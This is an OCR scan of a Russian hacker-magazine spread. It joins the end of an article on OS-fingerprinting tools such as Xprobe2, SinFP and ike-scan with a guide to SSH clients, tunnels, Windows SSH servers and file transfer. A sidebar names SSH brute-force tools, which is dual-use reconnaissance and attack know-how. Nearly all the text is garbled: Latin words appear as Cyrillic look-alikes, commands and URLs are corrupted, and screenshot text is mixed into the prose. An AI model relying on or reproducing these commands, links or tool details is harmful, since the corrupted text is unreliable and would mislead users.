Платформа: ІІпіх, МасОЗ, ѴѴІП32 

Все, чем занимается эта уникальная в своем роде утилита, 



5Т 1 >г лал-1 » * Ы«гк -в -і «*М> по* І**1 192.161.1.19 
Сіріиг ілд оп »*Ю 
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Р«е* ■ 0*8001 
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1 0820*0 М2 108 I 148 -> 210 180 Ш 88 1У4МР Ы»М1*у РгомсПот іМілИсО») 
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> Как обмануть тулзы для Лпдегргіпііпд’а? 



Сбить с толку утилиты для бпдегргіпЛпд’а в большинстве случаев несложно. 
Более того, можно не просто усложнить идентификацию, но и намеренно 
подсунуть сканнеру сигнатуру другой ОС. Для того чтобы сбить взломщика с 
толку, достаточно изменить некоторые из установок ТСР/ІР-стека на серве- 
ре. Для того же линукса в /ргос/зуз/пеі: вместо «64» можно влепить какое- 
нибудь другое число. Любителям же ѴѴіпбоѵѵз команда Р5Т ( гзЕѵоіб.ги ) сде- 
лала дружеский подгон в виде программы г57ВЕ (Ьгокеп бпдегз), с помощью 
которой можно легко поменять предустановленные настройки ТСР/ІР. Список 
эмулируемых осей достаточно велик и можно прикинуться как ВЭй-тачкой, 
так и игровой приставкой 5опу Ріаузіабоп 2 :). 



ІКЕ-БСАИ ОПРЕДЕЛИТ ОС НАСИСТЕМАХ В 
ВИРТУАЛЬНОЙ ЧАСТНОЙ СЕТИ 

— это распознает факт использования ѴРІ\І-соединения. 
Один из самых простых способов распознавания виртуаль- 
ных частных сетей основывается на посылке специального 
ІКЕ-пакета на каждую машину в сети. Большинство хостов, 
использующих ѴРІЧ, отконфигурировано таким образом, 
что в ответ на такой пакет отошлют ответ и, тем самым, 
выдадут свое присутствие. Подобных методов определения 
ѴРІЧ-сети іке-зсап — несколько. Ты скажешь: «При чем тут 
Епдегргіпбпд?». Причина есть. Определив ѴРІЧ-серверы, 
мы можем собрать массу информацию о них. А используя 
приемы Епдегргіпбпд’а, реализованные в іке-зсап, можно 
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ХРР0ВЕ2, ЗАПУЩЕННЫЙ ПОД У ВУМТІІ 




5АТ0КІ ФАНТАСТИЧЕСКИ ОПРЕДЕЛЯЕТ ВЕРСИЮ 
ВИНДЫ 



рготрт# . /5ІггРр.р1 -аі 192.168.0.86 -р 445 
Р1 : ВНИЗ Р0х12 М64240 00204^РРР М1460 

Р2 : В11113 Р0х12 М64240 00204тт0303000101080а000000000000000001010402 
МІ460 

РЗ: В11021 Р0х04 МО 00 МО 

ІРѴ4: НЕІІКІ5ТІС0/РІР2РЗ : МІПСІОМ5: Місгозо^Т: Міпсіомз: 2000 (5Р0, 5Р4) 



5ШРР АНАЛИЗИРУЕТ КОНКРЕТНЫЙ СЕРВИС НАОПРЕДЕЛЕННОМ ПОРТУ 



определить операционные системы на машинах, объединенных в вирту- 
альную частную сеть, а в случае аппаратного решения — производителя 
девайса. 

ХргоЬе2 

хдгоЬе.зоигсеІогде.пеІ: 

Платформа: Цпіх 

После долгого затишья разработчики взялись за свое детище и выпу- 
стили совершенно новую версию программы. ХргоЬе2 — это утилита для 
активного Рпдегргіпбпд’а, в арсенале которой как несколько знакомых 
по ІМтар’у алгоритмов идентификации удаленной ОС, так и ряд уни- 
кальных методик, в основе которых лежат результаты научных исследо- 
ваний Офира Аркина. 

Важным нововведением в последних версиях является модуль 
для обнаружения бопеуроі и систем с намеренно модифицирован- 
ными параметрами стека ТСР/ІР. Для обхода ограничений исполь- 
зуются алгоритмы нечеткой логики и собственные методики 
разработчиков. Помимо этого, в расчет берутся различные пара- 
метры поведения сетевых устройств. Например, рр входящий в 
состав ОрепВЗО известен тем, что возвращает разные значения в 
поле ТТІ_, когда за ним находится другая система. В режиме ска- 
нирования ТСР-портов (указывается флагом -Т] хргобе пытается 
найти и зафильтрованные брандмауэром сервисы. Аналогичным 
образом производится проверка ІЮР-портов, которая активирует- 
ся флагом -II. 

Примечательно, что ХргоЬе2 изначально реализовывала лишь один 
метод Ііпдегргіпбпд’а с помощью ІСМР-запросов. Поддержка других 
механизмов, а также специальный ішгіпд механизм, помогающий иден- 
тифицировать неизвестные системы или хосты с измененными параме- 
трами стека ТСР/ІР, появились позже. Надо сказать, что операционную 
систему, используемую на сервере, Хргобе определяет довольно-таки 
точно, а если в процессе появились спорные моменты, то в отчет войдет 
также список наиболее вероятных ОС с процентным соотношением 
вероятности. 



Баіогі 

ЬЦр://туѵѵеЬ.саЫеопе.пеСхпіЬ 
Платформа: ѴѴІпсІоѵѵз, І_іпих 

Автор Заіюгі потратил немало времени, разрабатывая приемы для 
активого ОС Рпдегргіпбпд’а, пока не осознал, насколько много инфор- 
мации можно получить, основываясь лишь на пассивном исследовании. 

В результате на свет появилась тулза, которая использует драйвер 
ѴѴіпРСар, прослушивает сетевой интерфейс и определяет версии ОС на 
машинах в локалке, основываясь на обработке перехваченных пакетов. 
Заіюгі очень четко определяет версию ѴѴІпсІоѵѵз, устройства производства 
НР (использующие НР ЗѵѵіІЬ Ргоіюсоі), девайсы Сізсо (за счет пакетов 
СОР-протокола]. Немалый вклад в результат, полученный с помощью 
Заіюгі, дают методы, основанные на исследовании ОНСР. Кстати говоря, 
на официальном сайте программы выложены классные статьи, в которых 
детально раскрываются методы для определения ОС. Теория подкрепля- 
ется практикой. Помимо Заіюгі, на странице разработчика ты найдешь 
утилиту ЗАМ, которая использует активное сканирование для определе- 
ния удаленной ОС путем отправки АРР-пакетов в сеть. 

-БіпРР 

ѵѵѵѵѵѵ.аотог.огд/Ьіп/ѵіеѵѵ/5іпф/ѴѴеЬНоте 
Платформа: ІІпіх, ѴѴІпсІоѵѵз 

ЗіпРР представляет собой новый подход к идентификации ОС, когда 
вместо исследования системы в целом, прощупываются отдельные 
сервисы. Тулза последовательно опрашивает указанные порты и только 
на основе опроса выдвигает предположение об установленной на уда- 
ленной машине системе. В то время, как ІЧтар осуществляет иденти- 
фикацию всего хоста и может легко быть обведен вокруг пальца за счет 
измененных параметров ТСР/ІР-стека, ЗіпРР использует сигнатурный 
анализ по конкретным портам. Прога написана на Регі, причем в случае 
необходимости ее можно использовать и в своих проектах, подключив 
модуль с одноименным названием. Его легко найти в СРАІМ: зеагсб. 
срапюгд/~дотог/І\Іе1:-5іпВР . Приятно, что с недавнего времени ЗіпРР 
работает не только под никсами, но еще и под виндой, т 
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СТЕПАН «5ТЕР» ИЛЬИН 

/5ТЕРіабАМЕ1.АЫ0.Ки / 



КАК СТАТЬ 

5ВН АСТЛИВЫМ 



РУИ-бУШЕ ПО ИСПОЛЬЗОВАНИЮ 5ЕС1ЖЕ 5НЕІ_І_ 



Стой! Не листай дальше. Если ты до сих пор воспринимаешь 88Н ис- 
ключительно как безопасную альтернативу устаревшему Теіпеі, не 
рискуй вызывать гнев богов, тьфу, разработчиков протокола. Ниже 
мы собрали самый полный мануал по правильному использованию 
8есиге 8ЬеІІ на полную катушку. 



ТРИК1: ПРОКАЧИВАЕМ 
55Н-КЛИЕНТ 

Несмотря на большое разнообразие 88Н- 
клиентов, особой проблемы с выбором не 
возникает. Общепризнанных всего два 
— РиТТѴ [ ѵѵѵѵѵѵ.сЫагк.дгеепепсІ.огд.ик І и 
БесигеСРТ [ ѵѵѵѵѵѵ.ѵапсіѵке.сопп і. и оба дей- 
ствительно хороши. Но если за «цитрамон» 
разработчики просят денежки, то РиТТѴ рас- 
пространяется прямо в открытых исходниках. 
По этой причине выбор зачастую остается 
именно за ним. Более того, несмотря на то, 
что многие воспринимают путти как виндо- 
вый клиент, у него есть версии и для И N IX. 
Саму прогу ты видел в действии, когда смо- 
трел ролики ѴІ5иаІЬаск++. С помощью него 
ты можешь коннектиться к своим сервакам 
через: Раѵѵ, Теіпеб Піодіп, РТР (8РТР), 88Н1, 
88Н2. В общем смысле, РиТТѴ — это ком- 
плект утилит, куда помимо непосредственно 



клиента (риІТу.ехе) входят тулзы: 

• риНудеп — генератор гза/сіза ключей, 
используемых для авторизации; 

• радепі — агент аутентификации, который 
хранит ключи в памяти, благодаря чему ты 
освобождаешься от ввода паролей ручками; 

• рііпк — интерфейс командной строки для 
ри«у; 

• рзср — утилита, обеспечивающая безопас- 
ное копирование файлов; 

• рзКр — безопасный Іф-клиент для копиро- 
вания, просмотра, переименования файлов 

и т.д. 

С некоторыми из этих утилит мы еще позна- 
комимся далее. 

Невзирая на личную симпатию к РиТТѴ, долгое 
время я отдавал предпочтение 8есигеСВТ. 
Почему? По большому счету — за одну малень- 
кую, но очень полезную опцию, не реализо- 
ванную в патти — поддержку та бо в для разных 
сессий. Если у тебя когда-нибудь было открыто 



пять, а то и больше окошек РиТТѴ для раз- 
ных серверов, ты знаешь, насколько тяжело 
ориентироваться среди них. Разработчики не 
спешат добавлять поддержку та бо в в утилиту, 
но зато с этим справилась группа французских 
энтузиастов, выпустив замечательную тулзу 
РиТТѴ Соппесііоп Мападег [ риІТѵсппТгее. 
фг). Что важно, это не какая-то там переделка 
исходников оригинального РиТТѴ, которая 
могла повлечь за собой новые баги, в том 
числе и безопасности. Напротив, за 88Н-сесии 
по-прежнему отвечает исходный бинарник 
(риНу.ехе), а РиТТѴ Соппесбоп Мападег лишь 
объединяет открытые окна в удобный интер- 
фейс с табами, а также предоставляет продви- 
нутый интерфейс для настроек подключения. 
Поддержка табов — это не единственный 
конек написанной на С# надстройки над 
РиТТѴ. После недели использования с трудом 
можешь представить жизнь без полезных 
опций: 
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5ЕС1ШЕ 5НЕУ- 



^ РиТТѴ СопЯдигаІіоп 



р^^БЕСЦКЕ »^^ 5ЕСЦКЕ 
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В ТегтіпаІ 
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Й Соппесііоп 
Раіа 
Ргоху 
І • Теіпеі 
I - Ріодіп 
+ $$Н 
БегіаІ 



Ва$іс орііопз іогуоиг РуТТУ $е$$іоп 



Бресту іЬе сіезііпаііоп уои ѵѵаШ іо соппесі іо 
Но$і Мате (ог ІР асЮге$$) Рогі 

192.183.1.1 22 
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192.168.10.1 
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С1о$е ^іпсіоѵѵ' оп ехіі: 

( А1ѵѵау$ О Меѵег ф Опіу оп сіеап ехіі 



АЬоиі Орел Сапсеі 

ДЛЯ ПОДКЛЮЧЕНИЯ УКАЗЫВАЕМ ПАРАМЕТРЫ СОЕДИНЕНИЯ С СЕР- 
ВЕРОМ ИЛИ ВЫБИРАЕМ НУЖНЫЙ ПРОФИЛЬ 




РУТТУ СО^ЕСТтЫ мамаоер 



5ЕСІІРЕ 



^ РиТТѴ Віу белемте* 



Е>яе Смщегюми Цсф 

Іу трчпц іЬв тодач л'«гЙі* «г 
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№и рвПйгМйі! кйу 



$аѵг руЬ*с кеѵ | рпѵДг кеу 



Турс^кв/Ъеаіѵгі» 

' 55 М-І (К 5 .М ф 55 Н-^а 5 Л 551*2 ЦІА 

ГЫпЬеглІ в«лрті(«І Іау і 1.И* 

ГЕНЕРИРУЕМ ПРИВАТНЫЙ И ОТ- 
КРЫТЫЙ КЛЮЧИ 




• сворачивание в трей; 

• автоматический логин без необходимости 
ввода пароля. Надо заметить, что стандарт не 
позволяет производить подобные действия, 
но в обход используется эмуляция ввода с 
клавиатуры пользователем; 

• выполнение произвольных команд после 
успешной авторизации в системе; 

• менеджер соединений, позволяющий 
задать для каждого из серверов отдельные 
параметры; 

• шифрование файла с настройками с помо- 
щью АЕ5; правда, для этого требуется устано- 
вить дополнительную И І_І_- библиотеку. 

ТРИК 2: ПОСТИГАЕМ ПРЕМУ- 
ДРОСТИ АВТОРИЗАЦИИ 

Самый простой способ авторизироваться на 
удаленном сервере — использовать связку 
логин/пароль. Понятно, что если к серверу 
коннетишься раз в день, то набрать связку 
вручную не составит труда (при условии, что 
помнишь их]. РиТТѴ для каждого подключе- 
ния позволяет сохранить настройки. В РиТТѴ 
ты можешь создавать профили для различных 
55Н-серверов, так что не придется вбивать 
настройки для конкретного сервера, когда ты 
захочешь к нему очередной раз подсоеди- 
ниться. В таком профиле, например, можно 
ввести логин, который будет использоваться 
для входа. Давай попробуем создать про- 
филь для сервера. Для этого переходим 
в категорию Зеззіопз. Здесь вводится 
ІР-адрес или имя хоста, порт, а также про- 
токол. Можно указать имя пользователя 
для подключения, под которым ты хочешь 



заходить в систему. Перейди в «Соппесііоп 
-> Оаіа» и укажи в «Аиіо-Іодіп изегпате» 
имя пользователя (например, СІзегАсс]. 
Затем снова иди в категорию Зеззіопз. 

Под надписью ЗаѵесІ Зеззіопз (сохранен- 
ные сессии] введи имя профиля, напри- 
мер, зеззіопі, после чего кликай на Заѵе. 

В следующий раз, когда будешь запускать 
РиТТѴ, просто выбери подходящий про- 
филь из ЗаѵесІ Зеззіопз, кликни І_оасІ и 
Ореп. Причем, имя пользователя введется 
автоматически. Стандарт на протокол 55Н 
запрещает сохранять пароль, но позже мы 
научимся обходить это ограничение. 

Для авторизации на удаленной системе 
можно сгенерировать и использовать 
пару ключей (открытый/закрытый] для 
ЗЗН-подключения к удаленной системе. 

В архив с программой входит дополни- 
тельная утилита РиТТѴдеп, которая помо- 
жет сгенерировать открытый и приватный 
ключ. Открытый ключ, как уже говори- 
лось, необходимо передать на удаленный 
сервер. В случае виндового сервера — 
путь к нему достаточно указать в настрой- 
ках аккаунта. Под никсами и ОрепЗЗН 
необходимо вставить в файл АззЬ/ 
аиіЬогІ 2 еб_кеуз 2 ключ в одну строку: 

тксііг ~/ . ззЪ. 

сктосі 7 00 ~/.ззк 

ѵі ~/ . ззк/аиккогІ2ес1_кеуз2 

ззк-йзз ААААВЗНгаСІксЗМАААЕ [ . 

. . ] Нш\г 2 РекР 1 Ж 7 рМдЕС>і 57 к= сіза- 

кеу -20061205 

сктосі 600 ~/ . ззЬ/аик1іогІ2е(і_кеуз2 



Файл должен читаться/правиться только 
данным пользователем, поэтому последней 
командой мы устанавливаем нужные права 
доступа. 

Что касается закрытого ключа, путь к нему 
требуется указать в настройках нужной сес- 
сии клиента (55Н АиіЬ Ргіѵаіе кеу Ые 
бог аиіНепіібсаііоп]. Добавлю, что даже при 
использовании пары ключей приходится 
каждый раз вводиться секретную фразу. Это 
сильно раздражает при частых коннектах. От 
проблемы может избавить утилита Радеапі, 
которая также входит в стандартный комплект 
РиТТѴ. 

Помимо этого, можно воспользоваться так 
называемым ззЬргоху ( ззЬ ргоху- рпфесЕогд/ 
аЬоиі ]. написанным на РуіЬоп. Тулза позво- 
ляет подключаться к удаленным хостам без 
необходимости ввода паролей или ключей. 

По сути, это маленький демон, который сидит 
в локалке или 0М2-зоне. Когда пользователь 
коннектится к нему с помощью ЗЗН-клиента, то 
ззЬргоху авторизирует его и проверяет права 
для доступа к нужному сайту. Если клиенту это 
разрешено, прокси выполняет соединение на 
удаленный сайт, используя пароль или ключ, 
сохраненные в его базе данных. 

ТРИК 3: ПРОБРАСЫВАЕМ 
ТУННЕЛИ 

Помимо доступа к удаленной командной стро- 
ке, 55Н предоставляет ряд других возмож- 
ностей. Первая — это туннелирование. После 
того, как установлено ЗЗН-соединение, можно 
безопасно роутить через туннель трафик 
одного или сразу нескольких приложений. Это 
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> іпіо 

Утилиты для брута 
55Н: 

• 55Н Вгиіе 
Рогсег [ ѵѵѵѵѵѵ. 
зесигііеат.сот/ 

ЩеШВШШЕ, 

Мші) 

• ЗЗНаиег 

[ Ітезбтеаі.пеі:/ 

ргоіесІ5/55Ііаиег ] 

• 55Н ВгиІеРогсег 
[ ѵѵѵѵѵѵ. сІагксОсІе. сот/ 
Ьгиіеіогсе ) 

• ТНС Нубга [ ѵѵѵѵѵѵТЬс. 
огдЛЬс-ЬусІга ) 
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Все утилиты для 
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В НАСТРОЙКАХ РКЕЕ55Н0 МОЖНОУКА- 
ЗАТЬТЕКСТПРИВЕТСТВЕННОГО БАННЕРА 



не только позволяет обойти файрвол, но еще и гарантиро- 
ванно скроет данные от прослушивания. Туннелинг сейчас 
поддерживают любые клиенты и серверы. Объясню смысл 
на примере нашего любимого РиТТѴ. 

Для конфигурации туннеля с помощью РиТТѴ нужно: 
в окне конфигурации подключения в категории 
«Зеззіоп» указать Ноз! №те (твой_ззЬ_сервер], Рог! (22) , 
Рго!осо! (55Н); 

• в категории «Соппесбоп/ЗЗН/ТиппеІз», в секции «АсИ 
пеѵѵ ІогѵѵагбесІ рог!», указать «Зоигсе рог!» (локальный_ 
порт, например, 666], йезбпабоп (адрес_прокси_или_ 
сервера :3306] ; 

• выбрать пункт І_осаІ и нажать кнопку «Добавить». 

После установления соединения можно запускать брау- 
зер, указав в качестве прокси 127.0.0.1 и порт, указанный 
в качестве Зоигсе Рог! (например, 666). 

В ипіх-системе достаточно набрать команду: 



ДЛЯ ЗАПУСКА И СТАРТА 55Н-СЕРВЕРА 
С ПОМОЩЬЮ М0ВА55Н ДОСТАТОЧНО ОДНО- 
ГО КЛИКАМЫШИ 

ТРИК4 БЕРЕМ НА ВООРУЖЕНИЕ 
2-НОР ТІІМЫЕІ. 

Что такое «поднял 2-хоповый ззб тунель (2-бор ззб !иппе!]»7 
55Н часто используется как транспортный протокол для 
безопасной передачи данных между другими приложениями, 
например, небезопасного ѴІ\ІС (удаленный рабочий стол]. 
Однако бывают ситуации, когда установить туннель невоз- 
можно: например, между двумя хостами нет возможности 
прямого подключения (банально из-за ограничений файр- 
вола]. Если ввести некоторый хост, с которым подключение 
может установить каждая из сторон, то его реально исполь- 
зовать как посредника, прибегнув к приему !ѵѵо бор !иппе(іпд 
(или, проще говоря, — туннель через дополнительный гейт). 
Достигается это так: сперва мы используем ззб, чтобы 
переадресовать трафик на порт той машины, с которой 
возможно установить соединение, и далее заставляем ее 
переадресовывать трафик на нужный нам хост (с которым 
для нее также возможен коннект]. В следующем при- 
мере мы будем осуществлять подключения с машины 



> Клиенты 

для мобильных устройств 



ззЬ -Ьббб : адрес_прокси_или_сервера : порт -п 
имяпользователя@адрес_зз!і_сервера 

Аналогичным образом можно поднять туннель до Му50І_- 
сервера, пробросить ѴІЧС-сессию до удаленного рабочего 
стола и т.д. 



СПРАВКА ПО ПОЛЕЗНЫМ КОМАНДАМ, КОТОРЫЕТЫ МО- 
ЖЕШЬ ИСПОЛЬЗОВАТЬ ВО ВРЕМЯ ПОДКЛЮЧЕНИЯ 
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- Иедізсгу іа ЬгонэаЬи ЫігоидЬ / геді лъ гу раЬЬ 

ДзеСиІ сошвапйэ 
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- МоЬаЗиІпСо: іпзъаііесі ргодгатз Іізг 

- МаЬаТааШзС, НоЬгіКіШаак: 1і.яЕ/кі11 Ніайона Евяісл 

- ТСРСарЬиге: Неькгогк расЗсеЬз апй рогьз пшпіЕогіпд Сооі 

- судраъіі: сіізріауэ «іпсіоиэ зресіаі Еоісіегз раъЬ 

- лер, аЕгр: ггапзЕег Шйі «іігаидЬ сЪе сгурсей іііі еошіеиійй 

- гэупс, ѵдеь: зупс Іосаі йігесъогіеэ ѵіъЬ пеьѵогк еошриьегз 

ТЬіз ѵегзіоп із ^ог ре г э опа 1 иэе ог еѵаіиаііоп ригроэез опіу 

Еог ШЕйпилсіоп ріеаэе ѵізіг: Ьгср : //яюЬаядЬ-Иьа&агеК-рет/ѵегдІопя .рЬр 



[5ас аиі іа - 07:і^:ьз] 



ВутЬіап: 

РиТТѴ Іог ЗутЬіап 05 [ з2ри!!ѵ.5оигсеІогде.пе! ' 
ѴѴіпсІоѵѵз МоЬКе: 

Роске!РиТТѴ [ ѵѵѵѵѵѵ. роскеіриііііу. пеі: ] 
баѵа: 

Мібр55Н [ ѵѵѵѵѵѵ.хк72.сот/тіс1р55б ] 
іРбопе: 

І55Н [ѵѵѵѵѵѵуіпсіег-зоІЕсот] 



«туботе. ехатріе. огд», в качестве промежуточного хоста 
будет выступать «даіеѵѵау.ехатріе.сот», а в роли желан- 
ной машины будет недоступный напрямую 55Н-демон на 
«зегѵег.ехатріе.сот». 

Наша задача — создать двух-хоповый туннель. Для этого 
на машине «туботе. ехатріе. огд» запускаем команду: 

ззЪ. -Т -К -Ь 5152 б : зегѵег . ехатріе . сот: 22 -2 
даСемау . ехатріе . сот 

Вот и все! В результате, 55Н-подключения на 51526 порт 
на машине туботе. ехатріе. огд будут туннелироваться на 
нужный хост [зегѵег.ехатріе.сот]. Другими словами, вместо 
невозможного напрямую соединения на зегѵег. ехатріе. 
сот:22, мы просто подключаемся на локальный хост и порт 
51526, а все заморочки возьмет на себя механизм 55Н. 



► 032 
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5ЕСІІКЕ 5НЕІ.І. ^Ж 5ЕСІІРЕ 5НЕІ.І. ^Ж 5ЕС11РЕ 

; •- □□ ; • □□ • 

МК5Н Согрогаіе ЕгіИіоп ;Х| ^ 




ШІ 58 Н ' 



11МЮШ501Ш5Н 

Ірдіп У СаЬеыау У Ре^ІЗор У Ідд У АЬоиЕ 



55 Н Саіеѵѵау Ног! 

ззксіаівшау.сот 

55Н Сотргеггіоп І_еѵвІ 

Ей ' 



I СоЫіаиге Ргаху 



>Ш 3 



□ Уге РгіѵаІе/РиЫіс Кеу АсЛНепІісаіюп 

[с :' уРгодгат Р]1е5\ЦѴі55Н\ргіѵа(ек&у.р&т~~| Ц 



1 СКапде Кеу Раи1Аюг<1 Кеу Іл^огтгйІоп 



Соппес! 



СІозе 



Неір 




*тзср> ореп пагі тРехапріе .соп 
КеагсЬіпд Іог Ьозі... 

Соппесііпд Іо Ъозі... 

ЙиіЬепІісаІіпд. . . 

ІІзіпд изегпате "таі*$іп”. 

[Раззиоггі: 

ниіЬепІісаІегі. 

Біагііпд іЬе зеззіоп... 

Веагііпд гетоіе сІігес<;огу . . . 

Зеззіоп зіагіесі. 

Ас^іое зеззіоп: [1] пагк іпРехапрІе .сот 
иіпзср> орііоп Ъгапзіег азсіі 
ФгапзІег азсіі 

иіпзср> сгі /Ьоте/тагі іп/риЫіс_Ыт1/иікі/иікі 
хЬо пе /таг<: іп /риЫ іс _Ы: т 1/и ік і/и ік і 
иіпзср> деЪ 

сотпапсіііпе . 1x1 ! 5 КіВ ! 

сопі ід.іхі ! 1 КіВ ! 

сопІгіЬиІіопз .1x1 ! 1 КіВ ! 

аігес1оі»у_сасЬе .1x1 ! 1 КіВ ! 

гігадехі.іхі ! 4 КіВ ! 

Іац.іхі ! Б КіВ ! 

1а^_соттапс^1іпе .1x1 ! 0 КіВ ! 

рад_«1іг_<1еЁаи1* -ІхЪ ! 1 КіВ ! 

Чіпзср> _ 



ѴѴШ5СР ПОЗВОЛЯЕТ АВТОМАТИЗИРОВАТЬ ЧАСТЬ РУТИННОМ РАБОТЫ 



5 КіВ 


76.7 КіВ/з 


а5сіі 


1 КІВ 


157.8 КіВ/з 


азсіі 


1 КіВ 


132.5 КІВ/з 


азсіі 


1 КІВ 


189.7 КІВ/з 


азсіі 


4 КІВ 


162.7 КіВ/з 


азсіі 


5 КІВ 


247.6 КІВ/5 


азсіі 


0 КіВ 


198.7 КіВ/5 


азсіі 


1 КіВ 


213.8 КіВ/5 


азе іі 



1^ 



5ЕСІІКЕ 




ТУЛЗА ДЛЯ ДОСТУПА К НЕМОТЕ 
йЕЗКТОР’У ЧЕРЕЗ 55Н 



Кстати, в качестве порта можно использовать 
и любой другой, но желательно из диапазона 
49152 - 65535 . 

ТРИК5: ПОДНИМАЕМ 
55Н-СЕРВЕР ПОД ВИНДОЙ 

С никсами все просто. Чуть ли не стандартом 
де-факто является всем известный ОрепББН, 
да и практически в любом дистрибе он уста- 
новлен по умолчанию. В условиях ограничен- 
ных ресурсов (на старых компьютерах, аппа- 
ратных роутерах, точках доступа и т.д.) зачастую 
устанавливают ОгорВеаг ( таіі.исс.азп.аи/ 
бгорЬеаг/бгорЬеаг.ЫтІ ]. Под виндой, впрочем, 
поднять ББН-сервер — тоже не бог весть, 
какая проблема. Для тех же самых ОрепББН 
и ОгорВеаг есть полноценные порты, но их 
трогать не будем. Обходим стороной и продви- 
нутый, но платный ѴѴіпББЕШ кл/ѵѵѵѵ.ЬіІѵізе.сопп/ 
ууіпззМ). В сравнении сѴѴіпЗЗШ программа 
МоЬаББН (тоЬаззЬ. тоЬаІек.пеі ] чарует своей 
простой. Все, что требуется для запуска полно- 
ценного ББН-сервера с авторизацией, исполь- 
зуя аккаунты пользователей в системе — это 
нажать одну кнопку «ІпзІаН». В системе туг же 
появится новая служба. 

После соединения с МоЬаББН и получения 
приветствия демона становится понятно, что 
это не что иное, как сильно переработан- 
ный порт ОрепББН, собранный с помощью 
компилятора Судѵѵі п . Для навигации по 
системе используются никсовые команды 
(Із вместо бігдля отображения содержимого 
текущего каталога и т.д.]. Имей в виду неко- 
торую специфику демона. Все локальные 
диски доступны через директорию /судбгіѵе. 
Достучаться до сетевых ресурсов можно, 
используя привычный адрес в ІЛ\ІС-формате: 
//<ЕАЫ_ѴѴ0РК5ТАТІ0І\І>, а вносить измене- 
ния в реестр — через директорию /гедізігу. 



Помимо этого есть ряд полезных команд: 

МоЬаНѵгІпПо: детальная информация 
об ОС и железе 

МоЬаЗѵгІпПо: список установлено в 
системе софта 

МоЬаТазкЬізб , МоЬаКіІІТазк : спи- 
сок процессов и удаление нужного 
ТСРСарЬшге: сетевой монитор 
зср, зШр: передача данных по 
криптованному ззЪ- соединению 
гзупс, ѵгдеб : синхронизация 
локальных папок с сетевыми ресур- 
сами 

МоЬаББН на 100% совместим со всеми ник- 
совыми и виндовыми клиентами. Полностью 
с нуля, а поэтому и без всяких юниксовых 
замашек написан бесплатный ітееББНсІ [ ѵѵѵѵѵѵ. 
ІтееззМ.сот ). С установкой также не воз- 
никнет проблем; причем, как будет работать 
демон, в виде сервиса системы или обычно- 
го приложения, предоставляется на выбор 
пользователю. Точно так же можно выбрать и 
оболочку — по умолчанию выбирается стан- 
дартный стб.ехе. Вообще, настроек не то, 
чтобы много, но как раз достаточно, чтобы все 
настроить под себя, включая авторизацию 
пользователя, приветственный баннер, пара- 
метры туннелирования, БЕТ и т.д. 

ТРИК6: НАЛАЖИВАЕМ 
НЕПРОБИВАЕМЫЙ КОН- 
НЕКТ 

Все то же самое можно сделать и при помо- 
щи консольной утилиты Рііпк, которая вхо- 
дит в комплект с РиТТѴ. Любые параметры 
реально задать через командную строку 
с помощью различных ключей, а можно 
использовать настройки, сохраненные в кон- 
кретной сессии. Так и поступим: 

рііпк шу-ззк-зеззіоп 

По разным причинам соединение может 
иногда «падать». Будь уверен, упадет оно в 
самый неподходящий момент. Чтобы этого 
не произошло, отслеживай состояние под- 




МОНТИРУЕМ ФАЙЛЫ СУДАЛЕН- 
НОГО ХОСТАВ ВИДЕ ЛОГИЧЕСКО- 
ГО ДИСКАВСИСТЕМЕ 

ключения и вновь устанавливай его при 
необходимости. Когда-то подобные скрипты 
я писал вручную, но сейчас есть отличная 
утилита МуЕпТиппеІ ( пете5І52.дх.пеі/радез/ 
МуЕпТиппеІ) . Она незаметно сидит в трее и 
поддерживает активными все необходимые 
55Н-туннели. Принцип прост: тулза отсле- 
живает процесс Рііпк. Если процесс умирает 
(соединение оборвано, сервер перегрузился 
или по какой-то еще причине удаленный хост 
стал недоступен), МуЕпТиппеІ автоматически 
перезапустит Рііпк. Системные ресурсы при 
этом используются по минимуму. Юзер впра- 
ве сам указать, как часто нужно проверять 
наличие коннекта: в самом скромном режиме 
«Біоѵѵ Роіііпд» МуЕпТиппеІ проверяет соеди- 
нение раз в секунду. Несмотря на то, что тулза 
написана под винду, она отлично чувствует 
себя с ѴѴіпе’ом и под никсами. 

ТРИК7 ИСПОЛЬЗУЕМ 
БЕЗОПАСНУЮ ПЕРЕДАЧУ 
ФАЙЛОВ 

Когда мы говорим об 55Н, не стоит забывать 
о безопасной передаче файлов (Бесиге іі Іе 
Ітапзіег), реализуемой на базе протоко- 
ла 5ЕТР (55Н Бііе Тгапзіег Ргоіосоі] и уже 
устаревшего протокола 5СР (Бесиге СоРу). 
Подключившись к серверу по 55Н, с помощью 
специального клиента можно выполнять все 
основные операции с файлами: загружать их 
на сервер, переименовывать файлы и папки, 
изменять свойства файлов, а также создавать 
символические ссылки и ярлыки. Одним из 
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обновления некоторых сайтов я нередко использую функцию по син- 
хронизации директорий, а автоматизировать часть рутинной работы на 
"сервере, где у меня хранятся бэкапы, помогает возможность написа- 
ния простых скриптов. Вдвойне приятно, что ѴѴіпЭСР интегрируется с 
Радеапі и позволяет использовать уже сохраненные публичные ключи 
и сохраненные парольные фразы для подключения. 

Впрочем, зачем вообще заморачиваться с запуском каких-то про- 
грамм? Файлы с удаленного сервера можно примонтировать прямо 
в систему, и, все равно, операции с ними буду осуществляться через 
55Н. ЕхрапОгіѵе ( ѵѵѵѵѵѵ.ехрапсігіѵе.сопп ). которая раньше называлась 
ЗЕірОгіѵе, позволяет прозрачно примонтировать новый логический 
диск и работать с ним, как если бы это была, к примеру, флешка. Я 
использую эту прогу в достаточно странном ключе, а именно — для 
доступа к файлам некоторых никсовых систем из-под винды :). 

ТРИК 8: КЛИЕНТ С ДОСТУПОМ ЧЕРЕЗ ВЕБ 



Ситуация: дома у тебя есть настроенный клиент, с параметрами 
сессий, ключами для доступа, сохраненными логинами и паролями. 
Приятно воспользоваться всеми этими благами удаленно. В этом 
плане интересной разработкой стал бесплатный ТеІпеІ/55Н клиент 
Тега Тепл [ ЬНр://ѵѵѵѵѵѵ.аѵега.сотЛегаІегпп І. Фишка в том, что тулза 
имеет встроенный веб-сервер, который включается через меню «ѴѴеЬ 
— Ассері НТТР Соппесбопз». После этого ты получаешь практически 
полноценный клиент через обычный браузер, просто набрав адрес 
машины и порт, на котором он принимает соединения. «А ведь навер- 
няка же есть реализации 55Н-клиента, полностью написанные для 
веб», — задумался я. В результате несложных поисков попалось сразу 
несколько реализаций, но самой качественной оказался ѴѴеЬБЬеІІ 
[ ѵѵѵѵѵѵ-рег50па[.иппісЬ.есІи/~ппге55І/ѵѵеЬ5ЬеЦ ). Единственная трабла — 
он написан на Руібоп, а потому установить его на простой хостинг не 
получится. Но зато он полностью сделан на А]ах, а использовать его 
удобно не только с обычного компа, но и с телефона (кстати, ссылки на 
